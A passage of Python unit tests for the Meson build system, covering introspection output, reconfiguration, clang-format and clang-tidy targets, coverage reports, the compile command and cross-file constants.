def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '78 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
